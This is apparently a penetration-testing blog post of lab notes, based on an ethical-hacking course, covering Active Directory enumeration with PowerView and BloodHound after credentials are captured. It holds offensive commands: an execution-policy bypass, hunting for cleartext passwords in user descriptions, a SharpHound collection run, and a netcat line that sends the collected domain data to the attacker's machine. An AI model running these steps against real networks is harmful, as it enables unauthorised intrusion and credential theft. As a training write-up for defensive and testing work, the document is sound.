Active Directory Enumeration Hacker Notes

Post-exploitation enumeration of the lab with captured credentials/hashes. Overview of PowerView and BloodHound setup and usage.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk. By continuing to read, you acknowledge the aforementioned user risks/responsibilities.


Based on TheCyberMentor's excellent Udemy course, available at https://www.udemy.com/course/practical-ethical-hacking/

Requirements/Tools

Requirements: credentials recovered from the MITM attack, which let us use the tools below.

Tools:

Using PowerView

Download PowerView.ps1 to the target and bypass the execution policy (the policy only controls which scripts may run; it is not a security boundary):

powershell -ep bypass

Execute PowerView

. .\PowerView.ps1

A very powerful tool; more information is available in HarmJ0y's cheat sheet:

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

Get Domain Policy:

Get-DomainPolicy

Get the current domain:

Get-NetDomain

Drill into the "system access" section of the policy (password length, lockout settings):

Get-DomainPolicy
(Get-DomainPolicy)."system access"

Find the minimum password length and start password attacks with 7-character passwords accordingly.

Find Users:

Get-NetUser

Produces a long, hard-to-read list.

Refined list:

Get-NetUser | select cn
Get-NetUser | select samaccountname
Get-NetUser | select description # check whether any descriptions contain cleartext passwords

List the properties we can search for via the pipe:

Get-UserProperty

Find when passwords were last set:

Get-UserProperty -Properties pwdlastset

This reveals whether there are stale passwords on the network.

Check Logon Count (used to identify honeypot accounts):

Get-UserProperty -Properties logoncount

Check bad password counts (you can see whether an account is under attack):

Get-UserProperty -Properties badpwdcount
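The three property checks above (pwdlastset, logoncount, badpwdcount) plus the description check are easier to read as one triage report. The following is an added PowerShell example, not part of the original notes or of PowerView: it takes objects shaped like Get-NetUser output, converts the FILETIME in pwdlastset, and flags stale passwords, never-logged-on accounts (possible honeypots), accounts under attack, and descriptions that look like they hold a password. The sample accounts and the thresholds are constructed assumptions.

```powershell
# Added example: triage PowerView user properties. In the lab you would use
#   $users = Get-NetUser
# instead of the constructed $users list at the bottom.
function Get-UserRiskReport {
    param(
        [Parameter(Mandatory)] $Users,
        [int] $StaleDays = 90,       # assumption: a password older than this is "stale"
        [int] $BadPwdThreshold = 5   # assumption: more failures than this looks like an attack
    )
    $now = Get-Date
    foreach ($u in $Users) {
        # pwdlastset is a Windows FILETIME (100-ns ticks since 1601-01-01);
        # 0 means the password was never set / must change at next logon.
        $lastSet = if ($u.pwdlastset -gt 0) { [datetime]::FromFileTime([long]($u.pwdlastset)) } else { $null }
        $flags = @()
        if ($null -eq $lastSet -or ($now - $lastSet).TotalDays -gt $StaleDays) { $flags += 'StalePassword' }
        if ($u.logoncount -eq 0) { $flags += 'NeverLoggedOn' }          # unused account or possible honeypot
        if ($u.badpwdcount -gt $BadPwdThreshold) { $flags += 'UnderAttack' }
        if ($u.description -match 'pass(word)?\s*[:=]') { $flags += 'SecretInDescription' }
        [pscustomobject]@{
            SamAccountName = $u.samaccountname
            PwdLastSet     = $lastSet
            LogonCount     = $u.logoncount
            BadPwdCount    = $u.badpwdcount
            Flags          = ($flags -join ',')
        }
    }
}

# Constructed sample data (hypothetical accounts and values, not lab output).
$users = @(
    [pscustomobject]@{ samaccountname='fcastle';    pwdlastset=(Get-Date).AddDays(-10).ToFileTime();  logoncount=42; badpwdcount=0;  description='' }
    [pscustomobject]@{ samaccountname='svc-backup'; pwdlastset=(Get-Date).AddDays(-400).ToFileTime(); logoncount=3;  badpwdcount=0;  description='Backup service password: EXAMPLE-VALUE' }
    [pscustomobject]@{ samaccountname='honey-adm';  pwdlastset=(Get-Date).AddDays(-5).ToFileTime();   logoncount=0;  badpwdcount=12; description='' }
)

# Show only accounts that raised at least one flag.
Get-UserRiskReport -Users $users | Where-Object { $_.Flags } | Format-Table -AutoSize
```

With the sample data, svc-backup is reported as StalePassword,SecretInDescription and honey-adm as NeverLoggedOn,UnderAttack, while fcastle raises no flag.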

List all network domain computers:

Get-NetComputer

For more information:

Get-NetComputer -FullData

Slightly too much information.

Find the operating systems:

Get-NetComputer -FullData | Select OperatingSystem

Use this to pick out which hosts on the network are servers.

Find Domain Admins:

Get-NetGroup -GroupName *admin*

Get Members of Domain Admins:

Get-NetGroupMember -GroupName "Domain Admins"

Find All SMB Shares on the Network:

Invoke-ShareFinder

Find All Group Policies:

Check GPOs for their display names and when they were changed:

Get-NetGPO | select displayname, whenchanged

A condensed version of the much larger full output.

Bloodhound

Collects data from Active Directory and presents it as a visual graph.

apt install bloodhound

Set up neo4j with `neo4j console` and change the default password.

Open the web interface at the link printed in the console output:

Log in with neo4j:neo4j; you are prompted to change the password.

Opted to use the kali password.

Neo4j Dashboard

Launch Bloodhound - Linux/Kali

bloodhound

Log in with the neo4j account and the neo4j URL. BloodHound is now set up; the next step is to pull data with the ingestor.

Pull data with the ingestor

  • Invoke-BloodHound (PowerShell)

Link: https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1

  • Place it onto the Windows 10 machine

Within a command prompt, set up the execution policy bypass:

powershell -ep bypass

Call SharpHound.ps1:

. .\SharpHound.ps1

Invoke SharpHound:

Invoke-BloodHound -CollectionMethod All -Domain MARVEL.local -ZipFileName file.zip

Move the file to Kali. Used the nc file transfer method; nc.exe was downloaded to the Windows machine via SimpleHTTPServer on Kali.

nc File Transfer Method:

  • Kali listener: ncat -lvp 80 > file.zip

  • Windows 10 machine: nc -nv 192.168.175.129 80 < file.zip -w15

File received:

Import file.zip into BloodHound via the upload button:

At this point my BloodHound crashed when loading file.zip, so I attempted to reinstall… and failed. Moved to building from source… failed. All mainly due to the fact that I was on the x86 version of Kali. Moved to installing BloodHound on a Windows 10 machine following these directions:

https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

Neo4j BloodHound issues:

IMPORTANT: When you install Java on the machine you will need to edit line 75 of:

C:\Users\fcastle\Downloads\neo4j-community-3.5.14-windows\neo4j-community-3.5.14\bin\Neo4j-Management\Get-Java.ps1

and within the Java bin folder you need to copy the “client” folder and paste it as “server”:

C:\Program Files (x86)\Java\jre1.8.0_231\bin

Launch Bloodhound - Windows

From this point I was able to load file.zip into BloodHound:

Queries:

Finding domain admins via the “Find all Domain Admins” query.

You will want to target boxes on which Domain Admins have accounts.

  • Locating High Value Targets via Query

Paths to follow are illuminated in red.

Highlighted via the course map.

Once a network is compromised you can plan your next target with Bloodhound.